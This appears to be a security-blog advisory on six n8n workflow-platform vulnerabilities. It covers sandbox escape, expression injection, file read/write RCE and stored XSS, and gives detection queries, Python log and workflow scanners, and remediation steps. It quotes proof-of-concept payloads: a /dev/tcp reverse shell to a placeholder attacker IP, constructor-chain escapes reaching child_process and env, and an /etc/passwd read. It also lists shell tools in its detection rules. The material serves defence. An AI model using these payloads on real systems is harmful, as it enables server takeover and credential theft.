Critical Security Alert: Multiple Zero-Day-Style Flaws in n8n Could Allow Full Server Takeover — Immediate Patching Strongly Advised

Product Overview

Product: n8n
Vendor: n8n GmbH
Type: Workflow Automation & Integration Platform
Core Technology: Node.js (TypeScript), Express backend, SQLite/PostgreSQL, optional Redis queue
Execution Capability: JavaScript expressions, custom JavaScript Code Node, Python Code Node, File system interaction

n8n is widely deployed in self-hosted environments and cloud instances to automate integrations between internal systems, SaaS applications, and infrastructure services. Because workflows may execute custom code and interact directly with the host file system, the application inherently operates with high privilege on the underlying system.

The following vulnerabilities impact core workflow execution, expression handling, sandboxing mechanisms, file access controls, and UI rendering. In misconfigured or internet-exposed deployments, these issues may result in full server compromise.


Vulnerability Summary Table

| CVE | Title | CVSS (Estimated) | Severity | Attack Vector | Authentication Required | Exploit Availability |
|---|---|---|---|---|---|---|
| CVE-2026-27498 | RCE via Read/Write Files + Git chaining | 9.8 | Critical | Remote | Yes | Public PoC (educational) |
| CVE-2026-27495 | Sandbox Escape → Host Compromise | 9.9 | Critical | Remote | Yes | Technical details public |
| CVE-2026-27577 | Expression Evaluation → Command Execution | 9.6 | Critical | Remote | Yes | Exploitation technique known |
| CVE-2026-27493 | Unauthenticated Expression Execution (Form Node) | 9.8 | Critical | Remote | No | Exploited in testing scenarios |
| CVE-2026-27578 | Stored XSS → Session Hijacking | 8.1 | High | Remote | Yes | Proof of concept available |
| CVE-2026-27494 | Arbitrary File Read via Python Code Node | 8.4 | High | Remote | Yes | Limited PoC |

CVE-2026-27498

Remote Code Execution via Read/Write Files Node and Git Chaining

Overview

Improper path validation and insufficient execution control in the Read/Write Files node allowed arbitrary file creation and modification. When chained with Git-based workflow functionality, malicious scripts could be introduced and executed on the host system.

The vulnerability arises from insufficient directory restrictions and the ability to interact with Git repositories inside workflows.

Technical Details

It was possible for a workflow to:

  • Write arbitrary content to system-accessible directories
  • Create or modify Git hooks (e.g., post-checkout, post-merge)
  • Trigger execution of malicious scripts via Git operations
  • Place executable payloads in runtime directories

Because n8n runs under Node.js with host-level access, any arbitrary file write may lead to command execution.

Educational PoC Concept

The following illustrates a reverse shell concept used in controlled lab testing:

bash -i >& /dev/tcp/attacker-ip/4444 0>&1

If written into a Git hook and triggered, command execution would occur.

Impact

  • Full remote code execution
  • Container breakout (if improperly isolated)
  • Credential theft from environment variables
  • Lateral movement inside internal networks

MITRE ATT&CK Mapping

  • T1059 – Command and Scripting Interpreter
  • T1105 – Ingress Tool Transfer
  • T1574 – Hijack Execution Flow

Detection

Indicators of Compromise

  • Unexpected .git directories created by workflows
  • File writes to /etc/, /root/, /usr/, or application runtime paths
  • n8n spawning bash, sh, curl, wget, or nc
  • Outbound network connections to unknown IP addresses

Detection Queries

Splunk

index=os_logs process_name=node parent_process=n8n
(command="bash" OR command="sh" OR command="curl" OR command="wget")

index=os_logs process_name=node file_path IN ("/etc/*","/root/*","/usr/*")

Elastic (KQL)

process.parent.name : "node" AND process.name : ("bash" OR "sh" OR "curl" OR "wget")
file.path : ("/etc/*" OR "/root/*" OR "/usr/*") AND process.name : "node"

Microsoft Sentinel (KQL)

SecurityEvent
| where ParentProcessName contains "node"
| where Process has_any ("bash","sh","curl","wget")

Official Patch

Upgrade to the latest patched release:
https://github.com/n8n-io/n8n/releases

Docker users should pull the newest official image.


CVE-2026-27495

Sandbox Escape Leading to Full Host Compromise

Overview

The JavaScript sandbox responsible for isolating user expressions was found to be bypassable. By abusing JavaScript constructor chains, access to the Node.js runtime was obtained.

Technical Details

The sandbox failed to properly restrict prototype access. The following pattern was used in controlled testing:

this.constructor.constructor('return process')()

Once access to process was achieved, system command execution became possible:

require('child_process').exec('id')

Impact

  • Full RCE
  • Access to system-level modules
  • Privilege escalation
  • Host compromise

Detection

Indicators

  • Expressions containing constructor.constructor
  • Use of require('child_process') in workflow JSON
  • Node.js spawning shell processes

Detection Queries

Splunk

index=app_logs "constructor.constructor"
index=os_logs parent_process=node process_name IN ("bash","sh")

Elastic

message : "constructor.constructor"

Sentinel

AppTraces
| where Message contains "constructor.constructor"

Official Patch

Upgrade immediately:
https://github.com/n8n-io/n8n/releases


CVE-2026-27577

Arbitrary Command Execution via Expression Evaluation

Overview

The expression engine evaluated user-controlled input inside {{ }} blocks without sufficient sanitization. Arbitrary JavaScript execution was possible.

Attack Scenario

A malicious workflow could contain:

{{$json["data"].constructor.constructor("return process")()}}

This led to access to Node internals and command execution.

Impact

  • RCE
  • Data exfiltration
  • Persistent backdoor implantation

Detection

Indicators

  • Workflow exports containing suspicious JavaScript
  • Expressions referencing process, mainModule, or child_process
  • Unexpected outbound connections

Detection Queries

Splunk

index=app_logs ("child_process" OR "mainModule" OR "process.env")

Elastic

message : ("child_process" OR "mainModule" OR "process.env")

Official Patch

Patched in current stable version:
https://github.com/n8n-io/n8n/releases


CVE-2026-27493

Unauthenticated Expression Execution via Form Node

Overview

The Form Node accepted public input that was evaluated inside workflow expressions without authentication checks. This allowed remote attackers to execute arbitrary expressions.

Exploitation Scenario

An attacker could submit:

{{constructor.constructor("return process")().env}}

Environment variables containing credentials would be exposed.

Impact

  • Unauthenticated RCE
  • Secret exposure
  • API key compromise

Detection

Indicators

  • Suspicious POST requests to form endpoints
  • High volume requests containing {{
  • Workflow execution triggered by anonymous IPs

Detection Queries

Splunk

index=web_logs method=POST uri_path="/form/*" "{{"

Elastic

http.request.method : "POST" AND url.path : "/form/*" AND message : "{{"
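The indicators above (POST requests to form endpoints carrying `{{`, and a high volume of them from one source) can be checked offline against proxy or WAF logs before tuning the SIEM queries. The script below is an added illustration, not n8n code and not part of the original advisory. It assumes a simplified combined-log shape in which the request body (or an excerpt of it) is recorded as the last quoted column, which is an assumption: ordinary access logs do not capture bodies, so a reverse proxy or WAF log is the realistic source. The log lines are constructed; the expression payload in them is the one shown in this advisory.

```python
"""Flag form-endpoint submissions that carry n8n expression syntax.

Added example for the CVE-2026-27493 indicators; not n8n tooling.
Log format and sample lines are constructed (assumed proxy/WAF log that
records a body excerpt as the final quoted field).
"""
import re
from collections import Counter

# Constructed sample: client ip, method, path, status, quoted body excerpt.
SAMPLE_LOG = """\
203.0.113.7 POST /form/contact-us 200 "name=alice&msg=hello"
203.0.113.7 POST /form/contact-us 200 "name={{constructor.constructor(\\"return process\\")().env}}"
203.0.113.7 POST /form/contact-us 200 "name={{$json.x}}"
203.0.113.7 POST /form/contact-us 200 "name={{process.env}}"
198.51.100.4 GET /form/contact-us 200 "-"
198.51.100.4 POST /form/contact-us 200 "msg=meeting at 10"
"""

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\d{3}) "(.*)"$')
# Any {{ ... }} block in a public submission is suspicious: legitimate form
# input has no reason to contain workflow expression syntax.
EXPRESSION_RE = re.compile(r"\{\{.*?\}\}")


def parse(line):
    """Turn one constructed log line into a dict, or None if malformed."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, method, path, status, body = m.groups()
    return {"ip": ip, "method": method, "path": path,
            "status": int(status), "body": body}


def is_suspicious(rec):
    """POST to a /form/ endpoint whose recorded body contains {{ ... }}."""
    return (rec["method"] == "POST"
            and rec["path"].startswith("/form/")
            and EXPRESSION_RE.search(rec["body"]) is not None)


def analyse(log_text, threshold=3):
    """Return (suspicious records, {ip: count} for ips at/above threshold)."""
    hits = [r for r in map(parse, log_text.splitlines()) if r and is_suspicious(r)]
    per_ip = Counter(r["ip"] for r in hits)
    noisy = {ip: n for ip, n in per_ip.items() if n >= threshold}
    return hits, noisy


if __name__ == "__main__":
    hits, noisy = analyse(SAMPLE_LOG)
    for r in hits:
        print("suspicious:", r["ip"], r["path"], r["body"])
    print("high-volume sources:", noisy)
```

The threshold is the knob to tune: a single `{{` in a free-text field can be a false positive, while several from one client in a short window is the pattern the "high volume requests containing {{" indicator describes.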

Official Patch

Upgrade to latest version:
https://github.com/n8n-io/n8n/releases


CVE-2026-27578

Stored Cross-Site Scripting in Workflow Metadata

Overview

Improper output encoding in workflow names and descriptions allowed script injection. When viewed by an administrator, malicious JavaScript executed in the browser.

Impact

  • Session cookie theft
  • Admin account takeover
  • Workflow manipulation

Detection

Indicators

  • <script> tags inside workflow names
  • Suspicious outbound HTTP requests from admin browsers
  • Unexpected admin sessions from new IP addresses

Detection Queries

Splunk

index=app_logs "<script>"

Elastic

message : "<script>"
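Several of the indicators in this advisory live in the workflow export itself rather than in runtime logs: `constructor.constructor` and `require('child_process')` (CVE-2026-27495), expressions referencing `process`, `mainModule` or `child_process` (CVE-2026-27577), and `<script>` tags in workflow names (CVE-2026-27578). The scanner below is an added example for those three sections, not n8n's own tooling. It relies only on the export's top-level `name` and `nodes` keys; the node parameters in the sample are constructed, and the expression and code fragments in it are the ones already quoted in this advisory.

```python
"""Scan an exported n8n workflow for the static indicators named for
CVE-2026-27495, CVE-2026-27577 and CVE-2026-27578.

Added example, not n8n code. The sample export is constructed; only the
"name" and "nodes" keys mirror the real export format.
"""
import json
import re

# Each rule is (label, regex) and is applied to every string leaf in the export.
RULES = [
    ("prototype-walk", re.compile(r"constructor\s*\.\s*constructor")),
    ("node-internals", re.compile(r"\b(child_process|mainModule|process\.env)\b")),
    ("html-script-tag", re.compile(r"<\s*script\b", re.IGNORECASE)),
]

# Constructed sample export (assumed parameter names; not a real workflow).
SAMPLE_EXPORT = json.dumps({
    "name": "Nightly sync <script>alert(1)</script>",
    "nodes": [
        {"name": "Shape data", "type": "n8n-nodes-base.set",
         "parameters": {"value": "={{$json[\"data\"].constructor.constructor(\"return process\")()}}"}},
        {"name": "Run code", "type": "n8n-nodes-base.code",
         "parameters": {"jsCode": "require('child_process').exec('id'); return [];"}},
        {"name": "Fetch", "type": "n8n-nodes-base.httpRequest",
         "parameters": {"url": "={{ $json.url }}"}},
    ],
})


def walk(obj, path="$"):
    """Yield (json_path, string) for every string leaf in the document."""
    if isinstance(obj, str):
        yield path, obj
    elif isinstance(obj, dict):
        for key, value in obj.items():
            yield from walk(value, f"{path}.{key}")
    elif isinstance(obj, list):
        for i, value in enumerate(obj):
            yield from walk(value, f"{path}[{i}]")


def scan_workflow(export_text):
    """Return a list of {rule, path, excerpt} findings for one export."""
    doc = json.loads(export_text)
    findings = []
    for path, text in walk(doc):
        for label, rx in RULES:
            if rx.search(text):
                findings.append({"rule": label, "path": path, "excerpt": text[:80]})
    return findings


if __name__ == "__main__":
    for f in scan_workflow(SAMPLE_EXPORT):
        print(f"{f['rule']:<16} {f['path']}: {f['excerpt']}")
```

Walking every string leaf rather than only known parameter names means the check also catches expressions hidden in notes, credentials names or pinned data, which is where a manual review tends to miss them. Run it over the export at import time to cover the "Monitor workflow imports" remediation item.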

Official Patch

Upgrade UI components via latest release:
https://github.com/n8n-io/n8n/releases


CVE-2026-27494

Arbitrary File Read via Python Code Node

Overview

The Python Code Node executed without file system restrictions. Sensitive system files could be accessed.

Exploitation (Educational)

with open('/etc/passwd') as f:
    print(f.read())

Impact

  • Credential disclosure
  • Infrastructure reconnaissance
  • Further attack staging

Detection

Indicators

  • Python node execution accessing /etc/, /proc/, /root/
  • Large response payloads from workflows
  • Repeated file read attempts

Detection Queries

Splunk

index=os_logs process_name=python parent_process=node file_path="/etc/*"

Elastic

process.name : "python" AND file.path : "/etc/*"
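The host-level indicators in this advisory come from two sections: CVE-2026-27498 (n8n or node spawning bash, sh, curl, wget or nc; writes under /etc/, /root/ or /usr/; Git hooks created or modified by workflows) and CVE-2026-27494 (a Python interpreter launched by node reading /etc/, /proc/ or /root/). The detector below is an added example that serves both sections; it is not n8n code and not part of the original advisory. It assumes EDR- or auditd-style telemetry already normalised to one JSON object per line with `type`, `name`, `parent_name`, `pid`, and `cmd` or `op`/`path` fields; those field names are an assumption, and every event line is constructed.

```python
"""Match workflow-host telemetry against the process and file indicators
given for CVE-2026-27498 and CVE-2026-27494.

Added example, not n8n code. The event schema is an assumed, simplified
EDR-style JSON-lines shape and the sample events are constructed.
"""
import json

WORKFLOW_PARENTS = {"n8n", "node"}
SHELLS_AND_TOOLS = {"bash", "sh", "dash", "curl", "wget", "nc"}
INTERPRETERS = {"python", "python3"}
SENSITIVE_PREFIXES = ("/etc/", "/root/", "/usr/", "/proc/")

# Constructed sample telemetry (one JSON object per line).
SAMPLE_EVENTS = """\
{"type":"process","pid":311,"name":"node","parent_name":"n8n","cmd":"node /usr/local/bin/n8n"}
{"type":"process","pid":402,"name":"bash","parent_name":"node","cmd":"bash -i"}
{"type":"process","pid":403,"name":"python3","parent_name":"node","cmd":"python3 -c ..."}
{"type":"file","pid":403,"name":"python3","parent_name":"node","op":"read","path":"/etc/passwd"}
{"type":"file","pid":311,"name":"node","parent_name":"n8n","op":"write","path":"/home/node/.n8n/repo/.git/hooks/post-checkout"}
{"type":"file","pid":311,"name":"node","parent_name":"n8n","op":"write","path":"/home/node/.n8n/binaryData/out.csv"}
{"type":"file","pid":311,"name":"node","parent_name":"n8n","op":"write","path":"/etc/cron.d/sync"}
{"type":"process","pid":500,"name":"bash","parent_name":"sshd","cmd":"bash"}
"""


def classify(ev):
    """Return the name of the matching rule for one event, or None."""
    parent_is_workflow = ev.get("parent_name") in WORKFLOW_PARENTS
    name_is_workflow = ev.get("name") in WORKFLOW_PARENTS

    if ev["type"] == "process":
        # CVE-2026-27498: shells and download tools launched from the workflow engine.
        if parent_is_workflow and ev["name"] in SHELLS_AND_TOOLS:
            return "workflow-spawned-shell-or-downloader"
        return None

    if ev["type"] == "file":
        path = ev["path"]
        # CVE-2026-27498: Git hooks written by (or on behalf of) a workflow.
        if ev["op"] == "write" and "/.git/hooks/" in path and (name_is_workflow or parent_is_workflow):
            return "git-hook-modified"
        # CVE-2026-27498: the engine itself writing into system paths.
        if ev["op"] == "write" and name_is_workflow and path.startswith(SENSITIVE_PREFIXES):
            return "workflow-write-to-system-path"
        # CVE-2026-27494: a Python child of node touching sensitive paths.
        if ev["name"] in INTERPRETERS and parent_is_workflow and path.startswith(SENSITIVE_PREFIXES):
            return "code-node-sensitive-file-access"
    return None


def detect(lines):
    """Run classify() over JSON-lines telemetry and collect alerts in order."""
    alerts = []
    for line in lines.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        rule = classify(ev)
        if rule:
            alerts.append({"rule": rule, "pid": ev["pid"],
                           "detail": ev.get("path") or ev.get("cmd")})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"{a['rule']:<36} pid={a['pid']} {a['detail']}")
```

The parent-process condition is what keeps the rules usable: `bash` under `sshd` (the last sample line) is an administrator, `bash` under `node` on an automation host is the indicator. Writes to the binary-data directory are deliberately allowed so that ordinary Read/Write Files usage does not alert.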

Official Patch

Upgrade to latest patched version:
https://github.com/n8n-io/n8n/releases


Immediate Remediation Actions

  • Upgrade to the latest n8n version immediately
  • Remove the instance from direct internet exposure; place it behind a VPN or an identity-aware proxy
  • Disable the Code and Python nodes if they are not needed
  • Run n8n as a non-root user
  • Enforce outbound firewall rules for the n8n host
  • Rotate all credentials stored in n8n
  • Monitor workflow imports for suspicious expressions and code

Aegiron

Backed by 11+ years in cybersecurity and incident response, we decode the latest threats shaping today’s digital battlefield. This blog cuts through the noise with clear insights on vulnerabilities, emerging exploits, and the cyber news defenders can’t afford to miss.